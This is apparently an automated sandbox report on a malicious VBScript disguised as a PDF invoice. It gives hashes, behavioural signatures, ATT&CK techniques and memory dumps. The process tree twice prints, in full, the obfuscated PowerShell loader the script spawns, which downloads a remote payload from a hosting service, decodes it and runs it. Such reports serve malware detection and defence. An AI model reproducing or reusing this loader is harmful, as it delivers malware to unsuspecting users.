Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-03-2024 02:00

General

  • Target

    MEDUPV843545_EXINV278.PDF.vbs

  • Size

    26KB

  • MD5

    9c85d725803bf621f8a45680650fd841

  • SHA1

    0b8b47cb69205a89d6fac5ea156630c7732ca031

  • SHA256

    59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d

  • SHA512

    4329e4da03d19106020dc8d958f96b1f3c0da082e69221f2a14be32599a30cae40df38075fd6a43ecac7001b6d61c6652130cab340e6ab02a525d42588c28e70

  • SSDEEP

    768:tIIJFMkYm8rSvWiRTcOuTgyjbpfn9FVItJpT+NYQcOudS0ttNA85WvjFSIgya3IW:KAFMk/8uvWiRgOuTgyjbpfn9FVItJpTD

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MEDUPV843545_EXINV278.PDF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Handbreadth='Opsonology:\Multiflorae';Set-Content $Handbreadth 'Exclosure';$Udragende=Test-Path $Handbreadth;if($Udragende){exit};function Kransstillet9 ($Dobbeltbevidsthedens){For($Pentacosane=4; $Pentacosane -lt $Dobbeltbevidsthedens.Length-1; $Pentacosane+=5){$Suprabuccal=$Suprabuccal+$Dobbeltbevidsthedens.'Substring'($Pentacosane, 1)};$Suprabuccal;}$Brokkedes=Kransstillet9 'DemuhManit BantNavip Nors.nfi: E.i/Refr/Subzd.bstr TraiU,gmvAnate Eks. Ud,gKundo Lavo Intg .rblUd.ye,kle.Dro.cPo,ao.nesm Roa/OpskuDepac Ins?HelieProvxRivap,iafoU,enrWhertGuid= SandKu koCyprw.ommnCulvlStenoF,ysa,verdDist&Kvali MisdE,do=Eksp1Visi8 CoulS raJCal.dRib 4FastVAft.DPeriA re.DUncaQAnveVkelpiTim,cTepoXUrydjSojawR,tty L.ir F,rqStyr1Subl3 ldenH.leE Cul8Rame3BevilHirtl Tolr Re._ C rSGiovkExc q ,or ';$Suprabuccal01=Kransstillet9 'Trl.iSti eMe ixBill ';$Efterbevilliges = Kransstillet9 'Bagg\.alss estyUndes andwRajpoFor,wPsyk6 Af.4Valg\PineWPriniBal nEscodRa,boRabbwKon.sBldnPLeadosurgw GioeFllerLunkSA beh T.lechrolAparlSchr\U.ejv Ind1Ro.g.Arbe0 Bla\ByplpIskroSykuwHobeeUnderUn.es O ahVe ee erflUdbrlL,te.Kde,e Renxe ideOver ';&($Suprabuccal01) (Kransstillet9 'Loch$FundOPerup Pols Kn oDetenMegaoLegelE ilooutsgSootyK on2Simu=G,ta$Di.aeStudn.endvPas.:Discw UnaiTrtinSpedd EneiCortr Ind ') ;&($Suprabuccal01) (Kransstillet9 'Bana$Pr wEPrmifMxfutColpeCivirskrib Emae,ortvSproiUnrilVergl acriBarmgdeite EndsWest=In o$AmatO DowpCapis Sclo LynnJonooPs,ulAlfaoDramg D cyOver2Skr.+Aggr$BaciEHyd.fafletEkskePi,mr,ncrbWheleMndevSoapiUdpalOwenl PoliUnpagLye eFests Bdd ') ;&($Suprabuccal01) (Kransstillet9 'Dewo$AarsI DisnDobltHel.oJingxSaniiT.ndcS peaArect PseeandesMyre .uts= Ska Amer( For(Achig PyrwFagtmSibli U,a haltw orviGeasnSkak3Frem2Antr_ko,epresprHus,o phicT xee WassGobosOv,r Infr-BaadFPost SupePVedhrEgotoShabcHy.reSprosRe,tsskalIHydrdPost=Ab.l$ ,dd{ uniPDattIBegyDi du}Excu)Micr. ImpCNutmoOct.mO,kom s,gaSdlan Kabd MusL Ps,i E.dnSup efu d)Pa.d G,ff-SamtsPostpEjeclKorti,dsttMarm Fane[P,otcCen hEkspa tefr ,ea] il3 For4 tr. ');&($Suprabuccal01) (Kransstillet9 'Begy$.nveCReweh usga Rr,mSigtfJernr InpaBenai I enDige Havn=Emyd embl$ rusIinstnBibltErkeo BlkxJou.iPlumcKaffaKroat S,reTills tr[Rens$MercISchin t.mtFed.oH.ndxD lkiBuggc St.aErfatSt.eeDacks ,ag.Hexec Mulo ampu DrenNo rtDert-R.ge2Afb.]Afkl ');&($Suprabuccal01) (Kransstillet9 'Aand$BlreC Rega,ansrRe noParlm .ineHeeldFaen=Unri(WedsTUni.eBesks deptScow-HvidPConca .idtMe,ehBequ And$ReguESenaf.ecotPurpeRainrS.atb .eie,ativ T kiRadbl MonlSubti.rifgPulveHap.s ler)Unme Alie-piloATunfn OvedDehy Trol(Kar [TvrmIPsycn.nertDepaPChart Andr Mod]Efte:Auto:Af ksSnotiTragz FireKur Klbe-,orteS.mpq Irr None8Armv)Mel, ') ;if ($Caromed) {&$Efterbevilliges $Chamfrain;} else {;$Suprabuccal00=Kransstillet9 ' DaiS .obt.icnafuggr elet ilb-SmanBAdstiCocktV.ids MakTDeoxrJordaMiksn.itosT,rpfPatheDjrvr V,i Prer-S,vaSPig.o eleuLaanrFlorc SyneUdde Supe$EkstB Frer L,no ,ttkBarrkExhaeVarmd O eeKalks Dis Rune-TranDRmmee SovsRebotB ggiUskin BoraAlcotIsopiChilo Signdign Pyrr$ReprOPro,p AposPastoGrsrnmiaooMemblSneuo Fi gEncryRela2 ,gf ';&($Suprabuccal01) (Kransstillet9 'Natt$DespO emgp .vesHameoCandn CatoPhysl,uttoNatugRingy Rec2 Aer= Bu,$ Va,eCestn To vN ur: CitaP lyp SkapTerndA,roa C,ct titaSe i ') ;&($Suprabuccal01) (Kransstillet9 'MexiI codm RospHaaro nhurvidetJer.- BooMUndeoForhd HypuHypslSanteAp,o NgteBDenai SumtKnalsI,ruTP.eurPancaMenin salsOasdfTe.aeLenirNond ') ;$Opsonology2=$Opsonology2+'\Manumissive.Maa';while (-not $Isocheimenal) {&($Suprabuccal01) (Kransstillet9 'Soup$Sn.nIDeamspjalollincDemihDagseNongi FilmUdsoeLagen,ersaJe.tlIsf.=Baan(Co.nTtofaeSavesUtritLade-PhytP peraCeratTwadh t,i Ombr$ByboO Brup Slus ResoH.ndnDitaoBueslRet,oUnasgP.orySymb2 Ndd) ,ey ') ;&($Suprabuccal01) $Suprabuccal00;&($Suprabuccal01) (Kransstillet9 ' BeaSRevotCredaDiakrPulgtG,nn-Un,oSSemil RegeChireBesvp,ron Hju,5Recu ');}&($Suprabuccal01) (Kransstillet9 'Wr.p$JubiKVks,r Traa IndnUdnvs Tris LentTilsiGur.lregilObsee setSou. mpo=Knib CoatGPreseDob.t Prc-GnosCUndeo,orenEogatguile Dimnsubzt Pla Mens$TornO.delpS.rosAfkboStrinill o,irklO taoS.iggInexyTryg2Q ar ');&($Suprabuccal01) (Kransstillet9 ',eop$A.beBUk.eaPreclComplOp ao HartFe ra,izatSk uiTweeoPatcnNoseeByg nMest1Adol9Unde4Rhab as.l= Ret Ne r[ WilSGlsnyEscrsSel tOrphe alvmBist.KabbCDelgoGenbn Jeav,moreVarirG,art em]Lymp:Know:FemkFW,itrvrngoRabamNoncBvipsaGlacsG,noe ,og6.ars4 oveSSemit Cowr Moni Gr.nF ougB.nz(Sca.$Fr.sKUncorTejuaBer n P,ms.imbsJuict SlaiDo.kl .hils,ateMolltNonm) ,ar ');&($Suprabuccal01) (Kransstillet9 'Cen $ KamSBoreuSjlepUndirAflua ,lab,loausputcBehfcDinga,enelGene2 Bol A.p= Cre .upr[MercSP.fcyRespssugatNordeLockmMan .KlimTT poe.anixArgotSeis.CommESabbn .atcGallo No.dmed,iPennn Ov.gGr,l]Skit:Edge:TjenAKrenSNonlCInteICompILuss.OverGT rmeDiagtdingSTrigtAsierC nciMi,inM.nxgH em(u dv$HypnB akkaDiscl FlolPalmodevetNu.baka,ktMonoiEflao shin Fjee DobnMult1h.ve9Naph4Ludd) Del ');&($Suprabuccal01) (Kransstillet9 'Arch$ B.goAvi v s.aeAfsprLab pVen rBil sDureiObfudTotae P.unFrittEx,reContnUnde=Rais$Sti,SBa.kuDammp lufrFoulaudgabVareu.fgicGabscNeonaUdful .ol2Rest. Fers ArbuHo.ebWi,zsOrdnt E ar SiciEro,nCoungPick(,uve3Samf0Ekss2prec8p,ot1Peri2Thyr,Past3 Mis8F.mr9Exha7S.bs7Lant)Tra, ');&($Suprabuccal01) $overprsidenten;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Handbreadth='Opsonology:\Multiflorae';Set-Content $Handbreadth 'Exclosure';$Udragende=Test-Path $Handbreadth;if($Udragende){exit};function Kransstillet9 ($Dobbeltbevidsthedens){For($Pentacosane=4; $Pentacosane -lt $Dobbeltbevidsthedens.Length-1; $Pentacosane+=5){$Suprabuccal=$Suprabuccal+$Dobbeltbevidsthedens.'Substring'($Pentacosane, 1)};$Suprabuccal;}$Brokkedes=Kransstillet9 'DemuhManit BantNavip Nors.nfi: E.i/Refr/Subzd.bstr TraiU,gmvAnate Eks. Ud,gKundo Lavo Intg .rblUd.ye,kle.Dro.cPo,ao.nesm Roa/OpskuDepac Ins?HelieProvxRivap,iafoU,enrWhertGuid= SandKu koCyprw.ommnCulvlStenoF,ysa,verdDist&Kvali MisdE,do=Eksp1Visi8 CoulS raJCal.dRib 4FastVAft.DPeriA re.DUncaQAnveVkelpiTim,cTepoXUrydjSojawR,tty L.ir F,rqStyr1Subl3 ldenH.leE Cul8Rame3BevilHirtl Tolr Re._ C rSGiovkExc q ,or ';$Suprabuccal01=Kransstillet9 'Trl.iSti eMe ixBill ';$Efterbevilliges = Kransstillet9 'Bagg\.alss estyUndes andwRajpoFor,wPsyk6 Af.4Valg\PineWPriniBal nEscodRa,boRabbwKon.sBldnPLeadosurgw GioeFllerLunkSA beh T.lechrolAparlSchr\U.ejv Ind1Ro.g.Arbe0 Bla\ByplpIskroSykuwHobeeUnderUn.es O ahVe ee erflUdbrlL,te.Kde,e Renxe ideOver ';&($Suprabuccal01) (Kransstillet9 'Loch$FundOPerup Pols Kn oDetenMegaoLegelE ilooutsgSootyK on2Simu=G,ta$Di.aeStudn.endvPas.:Discw UnaiTrtinSpedd EneiCortr Ind ') ;&($Suprabuccal01) (Kransstillet9 'Bana$Pr wEPrmifMxfutColpeCivirskrib Emae,ortvSproiUnrilVergl acriBarmgdeite EndsWest=In o$AmatO DowpCapis Sclo LynnJonooPs,ulAlfaoDramg D cyOver2Skr.+Aggr$BaciEHyd.fafletEkskePi,mr,ncrbWheleMndevSoapiUdpalOwenl PoliUnpagLye eFests Bdd ') ;&($Suprabuccal01) (Kransstillet9 'Dewo$AarsI DisnDobltHel.oJingxSaniiT.ndcS peaArect PseeandesMyre .uts= Ska Amer( For(Achig PyrwFagtmSibli U,a haltw orviGeasnSkak3Frem2Antr_ko,epresprHus,o phicT xee WassGobosOv,r Infr-BaadFPost SupePVedhrEgotoShabcHy.reSprosRe,tsskalIHydrdPost=Ab.l$ ,dd{ uniPDattIBegyDi du}Excu)Micr. ImpCNutmoOct.mO,kom s,gaSdlan Kabd MusL Ps,i E.dnSup efu d)Pa.d G,ff-SamtsPostpEjeclKorti,dsttMarm Fane[P,otcCen hEkspa tefr ,ea] il3 For4 tr. ');&($Suprabuccal01) (Kransstillet9 'Begy$.nveCReweh usga Rr,mSigtfJernr InpaBenai I enDige Havn=Emyd embl$ rusIinstnBibltErkeo BlkxJou.iPlumcKaffaKroat S,reTills tr[Rens$MercISchin t.mtFed.oH.ndxD lkiBuggc St.aErfatSt.eeDacks ,ag.Hexec Mulo ampu DrenNo rtDert-R.ge2Afb.]Afkl ');&($Suprabuccal01) (Kransstillet9 'Aand$BlreC Rega,ansrRe noParlm .ineHeeldFaen=Unri(WedsTUni.eBesks deptScow-HvidPConca .idtMe,ehBequ And$ReguESenaf.ecotPurpeRainrS.atb .eie,ativ T kiRadbl MonlSubti.rifgPulveHap.s ler)Unme Alie-piloATunfn OvedDehy Trol(Kar [TvrmIPsycn.nertDepaPChart Andr Mod]Efte:Auto:Af ksSnotiTragz FireKur Klbe-,orteS.mpq Irr None8Armv)Mel, ') ;if ($Caromed) {&$Efterbevilliges $Chamfrain;} else {;$Suprabuccal00=Kransstillet9 ' DaiS .obt.icnafuggr elet ilb-SmanBAdstiCocktV.ids MakTDeoxrJordaMiksn.itosT,rpfPatheDjrvr V,i Prer-S,vaSPig.o eleuLaanrFlorc SyneUdde Supe$EkstB Frer L,no ,ttkBarrkExhaeVarmd O eeKalks Dis Rune-TranDRmmee SovsRebotB ggiUskin BoraAlcotIsopiChilo Signdign Pyrr$ReprOPro,p AposPastoGrsrnmiaooMemblSneuo Fi gEncryRela2 ,gf ';&($Suprabuccal01) (Kransstillet9 'Natt$DespO emgp .vesHameoCandn CatoPhysl,uttoNatugRingy Rec2 Aer= Bu,$ Va,eCestn To vN ur: CitaP lyp SkapTerndA,roa C,ct titaSe i ') ;&($Suprabuccal01) (Kransstillet9 'MexiI codm RospHaaro nhurvidetJer.- BooMUndeoForhd HypuHypslSanteAp,o NgteBDenai SumtKnalsI,ruTP.eurPancaMenin salsOasdfTe.aeLenirNond ') ;$Opsonology2=$Opsonology2+'\Manumissive.Maa';while (-not $Isocheimenal) {&($Suprabuccal01) (Kransstillet9 'Soup$Sn.nIDeamspjalollincDemihDagseNongi FilmUdsoeLagen,ersaJe.tlIsf.=Baan(Co.nTtofaeSavesUtritLade-PhytP peraCeratTwadh t,i Ombr$ByboO Brup Slus ResoH.ndnDitaoBueslRet,oUnasgP.orySymb2 Ndd) ,ey ') ;&($Suprabuccal01) $Suprabuccal00;&($Suprabuccal01) (Kransstillet9 ' BeaSRevotCredaDiakrPulgtG,nn-Un,oSSemil RegeChireBesvp,ron Hju,5Recu ');}&($Suprabuccal01) (Kransstillet9 'Wr.p$JubiKVks,r Traa IndnUdnvs Tris LentTilsiGur.lregilObsee setSou. mpo=Knib CoatGPreseDob.t Prc-GnosCUndeo,orenEogatguile Dimnsubzt Pla Mens$TornO.delpS.rosAfkboStrinill o,irklO taoS.iggInexyTryg2Q ar ');&($Suprabuccal01) (Kransstillet9 ',eop$A.beBUk.eaPreclComplOp ao HartFe ra,izatSk uiTweeoPatcnNoseeByg nMest1Adol9Unde4Rhab as.l= Ret Ne r[ WilSGlsnyEscrsSel tOrphe alvmBist.KabbCDelgoGenbn Jeav,moreVarirG,art em]Lymp:Know:FemkFW,itrvrngoRabamNoncBvipsaGlacsG,noe ,og6.ars4 oveSSemit Cowr Moni Gr.nF ougB.nz(Sca.$Fr.sKUncorTejuaBer n P,ms.imbsJuict SlaiDo.kl .hils,ateMolltNonm) ,ar ');&($Suprabuccal01) (Kransstillet9 'Cen $ KamSBoreuSjlepUndirAflua ,lab,loausputcBehfcDinga,enelGene2 Bol A.p= Cre .upr[MercSP.fcyRespssugatNordeLockmMan .KlimTT poe.anixArgotSeis.CommESabbn .atcGallo No.dmed,iPennn Ov.gGr,l]Skit:Edge:TjenAKrenSNonlCInteICompILuss.OverGT rmeDiagtdingSTrigtAsierC nciMi,inM.nxgH em(u dv$HypnB akkaDiscl FlolPalmodevetNu.baka,ktMonoiEflao shin Fjee DobnMult1h.ve9Naph4Ludd) Del ');&($Suprabuccal01) (Kransstillet9 'Arch$ B.goAvi v s.aeAfsprLab pVen rBil sDureiObfudTotae P.unFrittEx,reContnUnde=Rais$Sti,SBa.kuDammp lufrFoulaudgabVareu.fgicGabscNeonaUdful .ol2Rest. Fers ArbuHo.ebWi,zsOrdnt E ar SiciEro,nCoungPick(,uve3Samf0Ekss2prec8p,ot1Peri2Thyr,Past3 Mis8F.mr9Exha7S.bs7Lant)Tra, ');&($Suprabuccal01) $overprsidenten;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 2284
          4⤵
          • Program crash
          PID:4396
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1428 -ip 1428
    1⤵
      PID:2580

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i20nyuvo.0ij.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1428-24-0x0000000005E00000-0x0000000005E66000-memory.dmp
      Filesize

      408KB

    • memory/1428-43-0x0000000007C00000-0x0000000007C14000-memory.dmp
      Filesize

      80KB

    • memory/1428-23-0x0000000005760000-0x00000000057C6000-memory.dmp
      Filesize

      408KB

    • memory/1428-44-0x00000000746B0000-0x0000000074E60000-memory.dmp
      Filesize

      7.7MB

    • memory/1428-42-0x0000000007B70000-0x0000000007B92000-memory.dmp
      Filesize

      136KB

    • memory/1428-19-0x00000000746B0000-0x0000000074E60000-memory.dmp
      Filesize

      7.7MB

    • memory/1428-18-0x0000000002C60000-0x0000000002C96000-memory.dmp
      Filesize

      216KB

    • memory/1428-20-0x0000000002E10000-0x0000000002E20000-memory.dmp
      Filesize

      64KB

    • memory/1428-21-0x00000000057D0000-0x0000000005DF8000-memory.dmp
      Filesize

      6.2MB

    • memory/1428-22-0x00000000056A0000-0x00000000056C2000-memory.dmp
      Filesize

      136KB

    • memory/1428-41-0x0000000008A20000-0x000000000909A000-memory.dmp
      Filesize

      6.5MB

    • memory/1428-40-0x0000000007DF0000-0x0000000008394000-memory.dmp
      Filesize

      5.6MB

    • memory/1428-36-0x00000000065C0000-0x000000000660C000-memory.dmp
      Filesize

      304KB

    • memory/1428-35-0x0000000006590000-0x00000000065AE000-memory.dmp
      Filesize

      120KB

    • memory/1428-34-0x0000000005F10000-0x0000000006264000-memory.dmp
      Filesize

      3.3MB

    • memory/1428-37-0x0000000007760000-0x00000000077F6000-memory.dmp
      Filesize

      600KB

    • memory/1428-38-0x0000000006A90000-0x0000000006AAA000-memory.dmp
      Filesize

      104KB

    • memory/1428-39-0x0000000006AE0000-0x0000000006B02000-memory.dmp
      Filesize

      136KB

    • memory/1884-10-0x00007FFDE70D0000-0x00007FFDE7B91000-memory.dmp
      Filesize

      10.8MB

    • memory/1884-47-0x00007FFDE70D0000-0x00007FFDE7B91000-memory.dmp
      Filesize

      10.8MB

    • memory/1884-17-0x000001F8BAC80000-0x000001F8BAC90000-memory.dmp
      Filesize

      64KB

    • memory/1884-4-0x000001F8D5420000-0x000001F8D5442000-memory.dmp
      Filesize

      136KB

    • memory/1884-16-0x000001F8BAC80000-0x000001F8BAC90000-memory.dmp
      Filesize

      64KB

    • memory/1884-11-0x000001F8BAC80000-0x000001F8BAC90000-memory.dmp
      Filesize

      64KB